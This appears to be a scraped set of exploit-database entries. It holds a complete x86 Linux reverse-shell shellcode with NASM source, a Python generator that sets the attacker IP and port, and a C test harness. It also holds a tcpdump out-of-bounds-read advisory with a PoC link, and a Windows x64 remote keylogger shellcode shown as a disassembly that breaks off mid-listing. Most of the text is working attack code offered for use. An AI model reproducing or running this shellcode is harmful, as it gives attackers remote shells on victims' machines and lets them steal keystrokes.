\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n; Filename: reverse_shell.nasm\r\n; Author: Dave Sully\r\n; Website: http://suls.co.uk\r\n; Purpose: Reverse shell in x86 assembly \r\n \r\nglobal _start \r\n \r\nsection .text\r\n_start:\r\n \r\n ; Clear everthing we are using \r\n xor eax, eax \r\n xor ebx, ebx \r\n xor ecx, ecx \r\n xor edx, edx \r\n xor esi, esi\r\n xor edi, edi\r\n \r\n ; Define structure for socket \r\n ; push 0x0100007f ; Push IP to stack in reverse byte order ; need to revist the null bytes here (127.0.0.1)\r\n ; We have a issue here in that the ip address 127.0.0.1 = 0x0100007f in hex which contains null bytes \r\n ; Easiest way around this is to XOR the value with 0xffffffff\r\n mov edi, 0xfeffff80 ; xor of 0x0100007f and 0xffffffff\r\n xor edi, 0xffffffff\r\n push edi\r\n push word 0xb315 ; Push 5555 to the stack in reverse byte order 5555 in hex = 0x15b3 \r\n push word 0x2 ; push 2 to the stack (AF-INET) \r\n \r\n ; Create socket \r\n ; s = socket(AF_INET, SOCK_STREAM, 0)\r\n mov ax, 0x167 ; Syscall 359 (socket)\r\n mov bl, 0x2 ; AF-INET (2) \r\n mov cl, 0x1 ; Sock stream (1) \r\n ; dl should already be zero \r\n int 0x80 ; call system interupt to create socket \r\n xchg esi, eax ; socket file descriptor now stored in esi \r\n \r\n ; Connect socket \r\n ; connect(s, (struct sockaddr *)&addr, sizeof(addr));\r\n mov ax, 0x16a ; Syscall 362 connect \r\n mov ebx, esi ; Move socket file descriptor into ebx \r\n mov ecx, esp ; Point ecx to the top of the stack which has our address structure on it \r\n mov dl, 0x10 ; Size of structure (16)\r\n int 0x80 ; call system interupt to create connect \r\n \r\n ; Dup input output and error file descriptors \r\n ; dup2(s, 0); // Dup2 sycall = 63 \r\n xor eax, eax ; Clear eax \r\n mov ebx, esi ; move socket id to ebx \r\n xor ecx, ecx ; Clear ecx \r\n mov cl, 0x2 ; set ecx to 2 \r\nloop:\r\n mov al, 0x3f ; syscall 63 \r\n int 0x80 ; call dup 2 \r\n dec ecx ; decrease ecx by 1 \r\n jns loop ; jump if not signed back to loop, this should cycle 2,1,0\r\n \r\n ; Execute Shell \r\n ; execve(\"/bin/sh\",0 ,0); // Execve syscall = 11\r\n ; (const char *filename, char *const argv[], char *const envp[]);\r\n xor eax,eax ; null eax \r\n mov al, 0xb ; syscall 11 into eax\r\n xor ebx, ebx ; zero ebx \r\n push ebx ; push a null string to the stack to terminate our string \r\n push 0x68732f2f ; hs//\r\n push 0x6e69622f ; nib/\r\n mov ebx, esp ; point ebx at the stack\r\n xor ecx, ecx ; clear ecx and edx as they are used in the syscall \r\n xor edx, edx\r\n int 0x80 \r\n \r\nsection .data\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n### Compile and link as follows \r\n \r\nnasm -f elf32 -o reverse_shell.o reverse_shell.nasm \r\ngcc -o reverse_shell reverse_shell.o \r\n \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n### To configure IP and port use the following python3 wrapper script \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n \r\n#!/usr/bin/env python3 \r\n# File: wrapper.py\r\n# Author: Dave Sully \r\n# Reverse shell wrapper in python3 \r\n# Usage: python3 wrapper.py 192.168.1.1 5000\r\n \r\nimport argparse\r\nimport socket \r\nfrom struct import unpack\r\n \r\nprint(\"\\n*****************************************\")\r\nprint(\"***** Reverse shell wrapper script ******\")\r\nprint(\"*****************************************\")\r\n \r\n# Grab command line args (ip and port) \r\nparser = argparse.ArgumentParser() \r\nparser.add_argument(\"ip\")\r\nparser.add_argument(\"port\")\r\nargs = parser.parse_args() \r\n# check port is in a valid range \r\nif ((int(args.port) > 65535) or (int(args.port) < 256)):\r\n print(\"\\nPort number must be between 256 and 65535\\n\")\r\n exit()\r\n \r\n# Xor Function \r\ndef xor_strings(str1,str2):\r\n result = int(str1,16) ^ int(str2,16)\r\n return '{:x}'.format(result)\r\n \r\n# Process IP address\r\nprint(\"\\nIP address: \"+ args.ip)\r\n# Convert IP to Hex \r\nhexip = socket.inet_aton(args.ip).hex() \r\nprint(\"Hex IP Address: \"+hexip)\r\n# Reverse the hex String \r\nrevhexip = hexip[6:8]\r\nrevhexip = revhexip + hexip[4:6]\r\nrevhexip = revhexip + hexip[2:4]\r\nrevhexip = revhexip + hexip[0:2]\r\n# Xor the reversed hex address as the shellcode XORs this address to avoid null bytes \r\nxored_ip = xor_strings(revhexip,\"FFFFFFFF\")\r\nprint(\"XORed reverse hex IP Address: \"+ xored_ip) \r\n \r\n# Process Port\r\nprint(\"\\nPort: \"+args.port)\r\n# Convert Port to hex \r\nhexport = hex(int(args.port)).replace('0x','')\r\nif len(hexport)<4:\r\n hexport = '0'+hexport\r\nprint(\"Hex Port: \"+hexport)\r\nrevhexport = hexport[2:4]+ hexport[0:2] \r\nprint(\"Reverse Hex Port: \"+revhexport)\r\n \r\n# Check for null bytes \r\nif (xored_ip[0:2]==\"00\" or \r\n xored_ip[2:4]==\"00\" or \r\n xored_ip[4:6]==\"00\" or \r\n xored_ip[6:8]==\"00\" or \r\n revhexport[0:2]==\"00\" or \r\n revhexport[2:4]==\"00\"):\r\n print(\"\\n** WARNING ** Null Bytes detected in Xored IP or port shellcode,\")\r\n print(\"shellcode may not work !\\n\")\r\n \r\n# Construct Shellcode \r\nshellcode= \\\r\n\"\\\\x31\\\\xc0\\\\x31\\\\xdb\\\\x31\\\\xc9\\\\x31\\\\xd2\\\\x31\\\\xf6\\\\x31\\\\xff\\\\xbf\" + \\\r\n \"\\\\x\"+ xored_ip[6:8] + \\\r\n \"\\\\x\"+ xored_ip[4:6] + \\\r\n \"\\\\x\"+ xored_ip[2:4] + \\\r\n \"\\\\x\"+ xored_ip[0:2] + \\\r\n\"\\\\x83\\\\xf7\\\\xff\\\\x57\\\\x66\\\\x68\" + \\\r\n \"\\\\x\"+ revhexport[2:4] + \\\r\n \"\\\\x\"+ revhexport[0:2] + \\\r\n\"\\\\x66\\\\x6a\\\\x02\\\\x66\\\\xb8\\\\x67\\\\x01\\\\xb3\\\\x02\\\\xb1\\\\x01\\\\xcd\\\\x80\\\\x96\\\\x66\" + \\\r\n\"\\\\xb8\\\\x6a\\\\x01\\\\x89\\\\xf3\\\\x89\\\\xe1\\\\xb2\\\\x10\\\\xcd\\\\x80\\\\x31\\\\xc0\\\\x89\\\\xf3\" + \\\r\n\"\\\\x31\\\\xc9\\\\xb1\\\\x02\\\\xb0\\\\x3f\\\\xcd\\\\x80\\\\x49\\\\x79\\\\xf9\\\\x31\\\\xc0\\\\xb0\\\\x0b\" + \\\r\n\"\\\\x31\\\\xdb\\\\x53\\\\x68\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x68\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe3\" + \\\r\n\"\\\\x31\\\\xc9\\\\x31\\\\xd2\\\\xcd\\\\x80\"\r\n# Output Shellcode \r\nprint(\"\\nShellcode (Length 91 Bytes): \\n\")\r\nprint(shellcode+\"\\n\")\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# Example output\r\n \r\n*****************************************\r\n***** Reverse shell wrapper script ******\r\n*****************************************\r\n \r\nIP address: 127.0.0.1\r\nHex IP Address: 7f000001\r\nXORed reverse hex IP Address: feffff80\r\n \r\nPort: 8080\r\nHex Port: 1f90\r\nReverse Hex Port: 901f\r\n \r\nShellcode (Length 91 Bytes): \r\n \r\n\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf\\x80\\xff\\xff\\xfe\\x83\\xf7\\xff\\x57\\x66\\x68\\x1f\\x90\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\r\n \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# To compile shellcode from the wrapper script use the following C program \r\n# Replacing the shellcode with the wrapper script shellcode output\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n// Filename: shellcode.c\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf\\x80\\xff\\xff\\xfe\\x83\\xf7\\xff\\x57\\x66\\x68\\x1f\\x90\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\";\r\n \r\nmain()\r\n{\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# Compile with \r\n \r\ngcc -fno-stack-protector -z execstack -o shellcode shellcode.c\n\n# 0day.today [2019-05-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32652"}, {"lastseen": "2019-03-05T02:18:45", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "1337DAY-ID-32287", "href": "https://0day.today/exploit/description/32287", "title": "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads Exploit", "type": "zdt", "sourceData": "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads Exploit\r\n\r\nThrough fuzzing of network capture .pcap files, we have identified 16 crashes with unique stack traces in tcpdump. These crashes are caused by heap-based out-of-bounds memory reads, and can be reproduced with the latest tcpdump source code from GitHub, compiled with AddressSanitizer:\r\n\r\n--- cut ---\r\n$ ./tcpdump --version\r\ntcpdump version 4.10.0-PRE-GIT\r\nlibpcap version 1.10.0-PRE-GIT (with TPACKET_V3)\r\nOpenSSL 1.1.0h 27 Mar 2018\r\nCompiled with AddressSanitizer/CLang.\r\n--- cut ---\r\n\r\nThe command line options we used are as follows:\r\n\r\n--- cut ---\r\n$ ./tcpdump -e -XX -vvv -R $file\r\n--- cut ---\r\n\r\nA summary of each crash with the two top-level callstack items are shown below:\r\n\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n| Id | Top of stack trace |\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n| 0c7293c683364afcf4d60f10fa296429 | #0 0x55fdd6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x55f43c in mfr_print tcpdump/./print-fr.c:498:17 |\r\n| 1092c136071deb2f21ddcde498353dfc | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774b8a in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:411:6 |\r\n| 472984168e31d86fcc3a2cf9b5ac1ddc | #0 0x7c5666 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x7e440e in rx_cache_find tcpdump/./print-rx.c:735:27 |\r\n| 55dca8197d3a7e5900df99c60db2821a | #0 0x73b2cb in rpl_printopts tcpdump/./print-icmp6.c:824:27 |\r\n| | #1 0x73af8b in rpl_daoack_print tcpdump/./print-icmp6.c:952:17 |\r\n| 5966513c685d91c5dc5edb42e5191ed4 | #0 0x7b975b in print_attr_vector64 tcpdump/./print-radius.c:1044:4 |\r\n| | #1 0x7b349e in radius_attrs_print tcpdump/./print-radius.c:1199:18 |\r\n| 5ef0457a44194a7e0fb1f1fa9c2d538c | #0 0x744b26 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x74ff59 in ikev1_n_print tcpdump/./print-isakmp.c:1766:4 |\r\n| 6535c4a7b0942711db1a5570bf428576 | #0 0x729f56 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x72835f in icmp_print tcpdump/./print-icmp.c:573:25 |\r\n| 6d3d893a2bc2d8d50cd9386737f1a3f1 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |\r\n| 7efd0ef3a3602ffba4d429f2beaf8489 | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |\r\n| 8e933ef7fdb3b248cffd2cc432ddfe0e | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |\r\n| 9a16cc309f6e8c57587f6cfc19ad15e0 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |\r\n| ab10aa7f73ff686440d2d40a174bf801 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x651264 in vrrp_print tcpdump/./print-vrrp.c:155:5 |\r\n| b388f74a9f892fb85d750dd0e32efce1 | #0 0x60d676 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x60ad3a in rsvp_obj_print tcpdump/./print-rsvp.c:1581:17 |\r\n| d203c6b47e3cbdf814ad3769589b3628 | #0 0x4bdf60 in __asan_memcpy (tcpdump/tcpdump+0x4bdf60) |\r\n| | #1 0x682088 in ip6addr_string tcpdump/./addrtoname.c:359:2 |\r\n| ec26a95bd915adce3527d4e8152eea84 | #0 0x7ba077 in EXTRACT_BE_U_8 tcpdump/./extract.h:111:20 |\r\n| | #1 0x7b97f5 in print_attr_vector64 tcpdump/./print-radius.c:1046:17 |\r\n| f7fc9a6bc515585b470f8b9c2d2729d7 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x650f19 in vrrp_print tcpdump/./print-vrrp.c:147:5 |\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n\r\nAttached is a ZIP archive containing up to three input samples per each crash, together with the corresponding ASAN logs.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46476.zip\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32287"}, {"lastseen": "2018-10-30T22:40:07", "bulletinFamily": "exploit", "description": "Exploit for win64 platform in category shellcode", "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "1337DAY-ID-31462", "href": "https://0day.today/exploit/description/31462", "title": "Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (Generator) 864 bytes", "type": "zdt", "sourceData": "/*\r\n \r\n # Title : Windows x64 Remote Keylogger (UDP)\r\n # size : 864 bytes\r\n # Author : Roziul Hasan Khan Shifat\r\n # Tested On : Windows 10 x64 pro\r\n # Date : 26-10-2018\r\n # Email: [email\u00a0protected]\r\n \r\n*/\r\n \r\n \r\n \r\n/*\r\n \r\n \r\nkeyl.obj: file format pe-x86-64\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n0000000000000000 <_start>:\r\n 0: eb 1d jmp 1f <p1>\r\n \r\n0000000000000002 <_init_>:\r\n 2: 48 31 d2 xor rdx,rdx\r\n 5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60]\r\n a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18]\r\n e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20]\r\n 12: 48 8b 30 mov rsi,QWORD PTR [rax]\r\n 15: 48 8b 06 mov rax,QWORD PTR [rsi]\r\n 18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20]\r\n 1c: 5b pop rbx\r\n 1d: 53 push rbx\r\n 1e: c3 ret \r\n \r\n000000000000001f <p1>:\r\n 1f: e8 de ff ff ff call 2 <_init_>\r\n \r\n0000000000000024 <_p2_>:\r\n 24: 52 push rdx\r\n 25: 52 push rdx\r\n 26: 4c 8d 3c 24 lea r15,[rsp]\r\n 2a: 48 83 ec 38 sub rsp,0x38\r\n 2e: 4c 8d 24 24 lea r12,[rsp]\r\n 32: 48 83 ec 58 sub rsp,0x58\r\n 36: 48 8d 3c 24 lea rdi,[rsp]\r\n 3a: 41 57 push r15\r\n 3c: 41 54 push r12\r\n 3e: 57 push rdi\r\n 3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548\r\n 46: 54 49 53 \r\n 49: 50 push rax\r\n 4a: 48 31 c0 xor rax,rax\r\n 4d: 66 b8 cc 01 mov ax,0x1cc\r\n 51: 48 01 c3 add rbx,rax\r\n 54: 53 push rbx\r\n 55: 48 89 f1 mov rcx,rsi\r\n 58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92]\r\n 5f: 4d 31 c0 xor r8,r8\r\n 62: 41 b0 02 mov r8b,0x2\r\n 65: 49 89 f9 mov r9,rdi\r\n 68: ff d3 call rbx\r\n 6a: 41 5d pop r13\r\n 6c: 48 31 c0 xor rax,rax\r\n 6f: 50 push rax\r\n 70: 50 push rax\r\n 71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377\r\n 78: 32 2e 64 \r\n 7b: 48 89 04 24 mov QWORD PTR [rsp],rax\r\n 7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c\r\n 86: 48 8d 0c 24 lea rcx,[rsp]\r\n 8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8]\r\n 8e: 48 83 ec 28 sub rsp,0x28\r\n 92: ff d6 call rsi\r\n 94: 48 96 xchg rsi,rax\r\n 96: 48 8d 4c 24 28 lea rcx,[rsp+0x28]\r\n 9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375\r\n a1: ff d0 call rax\r\n a3: 48 89 c1 mov rcx,rax\r\n a6: 49 8d 55 8c lea rdx,[r13-0x74]\r\n aa: 4d 31 c0 xor r8,r8\r\n ad: 41 b0 06 mov r8b,0x6\r\n b0: 4c 8d 4f 10 lea r9,[rdi+0x10]\r\n b4: 41 ff d5 call r13\r\n b7: 48 89 f1 mov rcx,rsi\r\n ba: 49 8d 55 e7 lea rdx,[r13-0x19]\r\n be: 4d 31 c0 xor r8,r8\r\n c1: 41 b0 03 mov r8b,0x3\r\n c4: 4c 8d 4f 40 lea r9,[rdi+0x40]\r\n c8: 41 ff d5 call r13\r\n cb: 48 83 c4 38 add rsp,0x38\r\n \r\n00000000000000cf <_p3_>:\r\n cf: 48 31 c9 xor rcx,rcx\r\n d2: 66 b9 98 01 mov cx,0x198\r\n d6: 48 29 cc sub rsp,rcx\r\n d9: 48 83 c1 6a add rcx,0x6a\r\n dd: 48 8d 14 24 lea rdx,[rsp]\r\n e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40]\r\n e5: ff d3 call rbx\r\n e7: 48 31 c9 xor rcx,rcx\r\n ea: b1 02 mov cl,0x2\r\n ec: 51 push rcx\r\n ed: 51 push rcx\r\n ee: 5a pop rdx\r\n ef: 41 58 pop r8\r\n f1: 41 b0 11 mov r8b,0x11\r\n f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48]\r\n f8: ff d3 call rbx\r\n fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax\r\n fe: 48 8b 1f mov rbx,QWORD PTR [rdi]\r\n 101: 48 31 c9 xor rcx,rcx\r\n 104: ff d3 call rbx\r\n 106: 41 c6 07 02 mov BYTE PTR [r15],0x2\r\n 10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db\r\n 111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1\r\n 118: 63 \r\n 119: 4d 31 c9 xor r9,r9\r\n 11c: 41 51 push r9\r\n 11e: 41 51 push r9\r\n 120: 59 pop rcx\r\n 121: 5a pop rdx\r\n 122: b1 0d mov cl,0xd\r\n 124: 49 89 c0 mov r8,rax\r\n 127: b2 bc mov dl,0xbc\r\n 129: 4c 01 ea add rdx,r13\r\n 12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10]\r\n 130: ff d3 call rbx\r\n \r\n0000000000000132 <_p4_>:\r\n 132: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 137: 48 31 d2 xor rdx,rdx\r\n 13a: 52 push rdx\r\n 13b: 52 push rdx\r\n 13c: 41 58 pop r8\r\n 13e: 41 59 pop r9\r\n 140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28]\r\n 144: ff d3 call rbx\r\n 146: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30]\r\n 14f: ff d3 call rbx\r\n 151: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38]\r\n 15a: ff d3 call rbx\r\n 15c: eb d4 jmp 132 <_p4_>\r\n \r\n000000000000015e <kernel32_func>:\r\n 15e: 47 rex.RXB\r\n 15f: 65 74 4d gs je 1af <user32_func+0x33>\r\n 162: 6f outs dx,DWORD PTR ds:[rsi]\r\n 163: 64 75 6c fs jne 1d2 <user32_func+0x56>\r\n 166: 65 48 61 gs rex.W (bad) \r\n 169: 6e outs dx,BYTE PTR ds:[rsi]\r\n 16a: 64 6c fs ins BYTE PTR es:[rdi],dx\r\n 16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx\r\n 172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261\r\n 179: 79 41 \r\n 17b: 01 53 65 add DWORD PTR [rbx+0x65],edx\r\n \r\n000000000000017c <user32_func>:\r\n 17c: 53 push rbx\r\n 17d: 65 74 57 gs je 1d7 <ws2_32_func>\r\n 180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f\r\n 187: 6f outs dx,DWORD PTR ds:[rsi]\r\n 188: 6f outs dx,DWORD PTR ds:[rsi]\r\n 189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41\r\n 18d: 01 43 61 add DWORD PTR [rbx+0x61],eax\r\n 190: 6c ins BYTE PTR es:[rdi],dx\r\n 191: 6c ins BYTE PTR es:[rdi],dx\r\n 192: 4e rex.WRX\r\n 193: 65 78 74 gs js 20a <get_addr+0x1a>\r\n 196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi]\r\n 198: 6f outs dx,DWORD PTR ds:[rsi]\r\n 199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1\r\n 19d: 47 rex.RXB\r\n 19e: 65 74 4b gs je 1ec <ws2_32_func+0x15>\r\n 1a1: 65 79 53 gs jns 1f7 <get_addr+0x7>\r\n 1a4: 74 61 je 207 <get_addr+0x17>\r\n 1a6: 74 65 je 20d <get_addr+0x1d>\r\n 1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax\r\n 1ab: 74 4d je 1fa <get_addr+0xa>\r\n 1ad: 65 73 73 gs jae 223 <get_addr+0x33>\r\n 1b0: 61 (bad) \r\n 1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx\r\n 1b8: 6e outs dx,BYTE PTR ds:[rsi]\r\n 1b9: 73 6c jae 227 <get_addr+0x37>\r\n 1bb: 61 (bad) \r\n 1bc: 74 65 je 223 <get_addr+0x33>\r\n 1be: 4d rex.WRB\r\n 1bf: 65 73 73 gs jae 235 <get_addr+0x45>\r\n 1c2: 61 (bad) \r\n 1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax\r\n 1c9: 70 61 jo 22c <get_addr+0x3c>\r\n 1cb: 74 63 je 230 <get_addr+0x40>\r\n 1cd: 68 4d 65 73 73 push 0x7373654d\r\n 1d2: 61 (bad) \r\n 1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx\r\n \r\n00000000000001d7 <ws2_32_func>:\r\n 1d7: 57 push rdi\r\n 1d8: 53 push rbx\r\n 1d9: 41 53 push r11\r\n 1db: 74 61 je 23e <get_addr+0x4e>\r\n 1dd: 72 74 jb 253 <get_addr+0x63>\r\n 1df: 75 70 jne 251 <get_addr+0x61>\r\n 1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi\r\n 1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65]\r\n 1e7: 74 01 je 1ea <ws2_32_func+0x13>\r\n 1e9: 73 65 jae 250 <get_addr+0x60>\r\n 1eb: 6e outs dx,BYTE PTR ds:[rsi]\r\n 1ec: 64 74 6f fs je 25e <get_addr+0x6e>\r\n 1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx\r\n \r\n00000000000001f0 <get_addr>:\r\n 1f0: 56 push rsi\r\n 1f1: 57 push rdi\r\n 1f2: 41 50 push r8\r\n 1f4: 52 push rdx\r\n 1f5: 41 51 push r9\r\n 1f7: 51 push rcx\r\n 1f8: 41 5b pop r11\r\n 1fa: 48 31 db xor rbx,rbx\r\n 1fd: 53 push rbx\r\n 1fe: 53 push rbx\r\n 1ff: 5a pop rdx\r\n 200: 58 pop rax\r\n 201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c]\r\n 204: 48 01 cb add rbx,rcx\r\n 207: b2 88 mov dl,0x88\r\n 209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1]\r\n 20c: 48 01 c8 add rax,rcx\r\n 20f: 48 31 d2 xor rdx,rdx\r\n 212: 52 push rdx\r\n 213: 52 push rdx\r\n 214: 52 push rdx\r\n 215: 41 58 pop r8\r\n 217: 41 59 pop r9\r\n 219: 41 5a pop r10\r\n 21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]\r\n 21f: 4d 01 d8 add r8,r11\r\n 222: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24]\r\n 226: 4d 01 d9 add r9,r11\r\n 229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]\r\n 22d: 4d 01 da add r10,r11\r\n 230: 48 31 d2 xor rdx,rdx\r\n 233: 48 31 f6 xor rsi,rsi\r\n 236: 56 push rsi\r\n 237: 59 pop rcx\r\n 238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4]\r\n 23c: 4c 01 de add rsi,r11\r\n 23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]\r\n 244: 48 31 c0 xor rax,rax\r\n 247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1]\r\n 24a: 48 ff c1 inc rcx\r\n 24d: 3c 01 cmp al,0x1\r\n 24f: 75 f6 jne 247 <get_addr+0x57>\r\n 251: 48 ff c2 inc rdx\r\n 254: 51 push rcx\r\n 255: 48 ff c9 dec rcx\r\n 258: 48 87 f7 xchg rdi,rsi\r\n 25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]\r\n 25d: 59 pop rcx\r\n 25e: 75 d3 jne 233 <get_addr+0x43>\r\n 260: 48 ff ca dec rdx\r\n 263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]\r\n 268: 48 01 cf add rdi,rcx\r\n 26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi\r\n 270: 48 31 db xor rbx,rbx\r\n 273: 53 push rbx\r\n 274: 58 pop rax\r\n 275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2]\r\n 27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4]\r\n 27e: 4c 01 d8 add rax,r11\r\n 281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp]\r\n 285: 48 89 03 mov QWORD PTR [rbx],rax\r\n 288: 48 83 c3 08 add rbx,0x8\r\n 28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx\r\n 290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]\r\n 295: 48 ff cb dec rbx\r\n 298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx\r\n 29d: 48 31 d2 xor rdx,rdx\r\n 2a0: 48 39 d3 cmp rbx,rdx\r\n 2a3: 75 8e jne 233 <get_addr+0x43>\r\n 2a5: 48 83 c4 18 add rsp,0x18\r\n 2a9: 5f pop rdi\r\n 2aa: 5e pop rsi\r\n 2ab: c3 ret \r\n \r\n00000000000002ac <_proceed_>:\r\n 2ac: 48 83 ec 58 sub rsp,0x58\r\n 2b0: 41 50 push r8\r\n 2b2: 52 push rdx\r\n 2b3: 51 push rcx\r\n 2b4: 48 31 f6 xor rsi,rsi\r\n 2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548\r\n 2be: 54 49 53 \r\n \r\n00000000000002c1 <find>:\r\n 2c1: 4c 8b 14 34 mov r10,QWORD PTR 